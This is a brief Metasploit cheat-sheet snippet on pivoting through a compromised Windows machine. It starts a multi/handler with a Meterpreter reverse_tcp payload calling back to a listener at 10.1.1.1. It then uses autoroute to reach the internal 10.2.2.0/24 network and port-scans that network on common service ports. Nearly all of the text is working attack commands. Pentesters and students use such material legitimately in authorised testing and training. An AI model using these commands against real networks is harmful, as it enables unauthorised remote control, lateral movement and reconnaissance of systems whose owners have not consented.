# With "autoroute" it is possible to attack through the remote machine. # Start handler use exploit/multi/handler set payload windows/meterpreter/reverse_tcp set lhost 10.1.1.1 # Add route to which network you want to look into run autoroute -s 10.2.2.0/24 run autoroute -p # Scan use auxiliary/scanner/portscan/tcp set RHOSTS 10.2.2.0/24 set THREADS 50 set ports 20,21,22,25,53,69,80,139,443,445,993,8080